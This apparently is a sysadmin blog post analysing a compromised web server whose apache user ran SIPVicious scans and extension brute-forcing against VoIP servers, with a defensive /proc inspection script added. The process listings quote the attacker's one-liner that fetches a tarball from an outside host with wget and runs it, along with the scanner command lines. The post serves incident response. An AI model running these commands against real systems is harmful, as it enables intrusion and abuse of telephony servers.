This was a fairly fun experiment: tracking down the source of a shell script that had been spawned by Apache. The script scanned for VoIP (SIP) servers and, once it found some, launched a brute-force attack against them using a dictionary of predefined "users" (extension numbers).
This is what it looked like from the command line.
[root@server~]# ps faux |grep -i python -B 3
apache    5909  0.0  0.0   1716   284 ?        S    21:00   0:00  \_ -bash
apache    5910  0.0  0.0   2448  1028 ?        S    21:00   0:00      \_ sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;rm -rf aloha.tar;wget http://www.dlaczego.org.pl/httpdocs/aloha.tar -q;tar -vxf aloha.tar;cd aloha;sh start;sh own
apache    5923  0.0  0.0   2448  1052 ?        S    21:00   0:00          \_ sh own
apache    5924  0.0  0.3  11244  7076 ?        S    21:00   0:02              \_ python svmap.py --randomize 193.*.*.*
--
root     13508  0.0  0.1   8348  2056 pts/0    S    21:54   0:00  \_ su -
root     13509  0.0  0.0   3748  1524 pts/0    S    21:54   0:00      \_ -bash
root     13687  0.0  0.0   2436   876 pts/0    R+   21:55   0:00          \_ ps faux
root     13688  0.0  0.0   3000   644 pts/0    D+   21:55   0:00          \_ grep -i python -B 3
apache   13683  3.6  0.2   9420  4940 ?        R    21:55   0:00 python svwar.py -v -e100-9999 193.11.222.209
This clearly shows that the user "apache" was able to start a custom shell command, which downloaded a tarball and executed a well-chosen toolkit from it. The "aloha.tar" file actually contained the SIPVicious tools, which are normally used to audit VoIP systems.
It extracted itself into /tmp (where else?) and started scanning. That launches a lot of svmap.py and svwar.py Python processes, which do the actual VoIP work: svmap.py locates SIP servers in the given range, and svwar.py enumerates extensions (here 100 through 9999) on a server it found.
The parent process is the interesting one.
[root@server~]# cat /proc/5905/environ
TERM=linux
OLDPWD=/var/www/vhosts/somedomain.net/httpdocs/phpMyAdmin
PATH=.
PWD=/tmp
LANG=C
SHLVL=3
_=./httpd
[root@server~]#
That parent process has a very useful piece of information in its "environ" (the entries are NUL-separated, which is why cat prints them without line breaks). OLDPWD tells us that the shell was previously working in the folder "/var/www/vhosts/somedomain.net/httpdocs/phpMyAdmin", the presumable entry point of this hack. Its current working directory (PWD) is /tmp, PATH has been reduced to ".", and the "_" variable shows that the last command it started was ./httpd.
That "httpd" binary in /tmp (not the real Apache) then started the command seen as process 5910 above:
[root@server~]# cat /proc/5910/cmdline
sh
-c
export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;rm -rf aloha.tar;wget http://www.dlaczego.org.pl/httpdocs/aloha.tar -q;tar -vxf aloha.tar;cd aloha;sh start;sh own
[root@server ~]#
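The environ and cmdline dumps above are hard to read because both files are NUL-separated. The following helper script is an added example (not part of the original post, and not the attacker's code) of how to pull the same facts out of /proc in a readable form: the NUL-separated fields one per line, a single variable such as OLDPWD, a summary of cwd/exe/cmdline for a live pid, and a walk up the parent chain to see who spawned the scanner. The PID and the sample environ contents used in the test are assumptions taken from this page.

```shell
#!/bin/sh
# Added example: readable /proc inspection for an incident like the one above.
# /proc/<pid>/environ and /proc/<pid>/cmdline separate fields with NUL bytes,
# so plain cat runs everything together. tr turns the NULs into newlines.

# Print the NUL-separated fields of a file one per line.
nul_to_lines() {
    tr '\0' '\n' < "$1"
}

# Extract one variable (e.g. OLDPWD or _) from an environ-style file.
# $1 = file, $2 = variable name
env_var() {
    tr '\0' '\n' < "$1" | sed -n "s/^$2=//p"
}

# Summarise a live process: cwd, exe, cmdline, and the environment entries
# most useful in an intrusion (PWD/OLDPWD show where it was launched from,
# PATH shows tampering, _ shows how the last command was invoked).
proc_summary() {
    pid="$1"
    d="/proc/$pid"
    [ -d "$d" ] || { echo "no such pid: $pid" >&2; return 1; }
    echo "pid:     $pid"
    echo "cwd:     $(readlink "$d/cwd")"
    # exe carries a "(deleted)" suffix if the attacker removed the binary
    echo "exe:     $(readlink "$d/exe")"
    echo "cmdline: $(tr '\0' ' ' < "$d/cmdline")"
    echo "environ:"
    tr '\0' '\n' < "$d/environ" | grep -E '^(PWD|OLDPWD|PATH|_)=' | sed 's/^/    /'
}

# Walk the parent chain from a pid up to init, printing "pid (name)".
# On this page that chain runs: python -> sh own -> sh -c ... -> -bash -> httpd.
ancestry() {
    pid="$1"
    while [ "$pid" -ge 1 ] 2>/dev/null && [ -r "/proc/$pid/status" ]; do
        name=$(sed -n 's/^Name:[[:space:]]*//p' "/proc/$pid/status")
        printf '%s (%s)\n' "$pid" "$name"
        pid=$(sed -n 's/^PPid:[[:space:]]*//p' "/proc/$pid/status")
    done
}

# Usage on a live box (pid assumed, as on this page):
#   proc_summary 5905
#   ancestry 13683
#   env_var /proc/5905/environ OLDPWD
```

Run it against the scanner's pid first (the python process), then walk up with ancestry until the owner changes from apache to something else; the first process whose cwd or OLDPWD points into a web root is usually the one that was exploited.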
The cause: an outdated phpMyAdmin, combined with an FTP account that had (chrooted) shell access. That is a very simple option to tick in the Plesk control panel, and one with potentially dangerous consequences if a software bug or application vulnerability can be exploited, because the web server user then has a working shell to hand to whatever it downloads.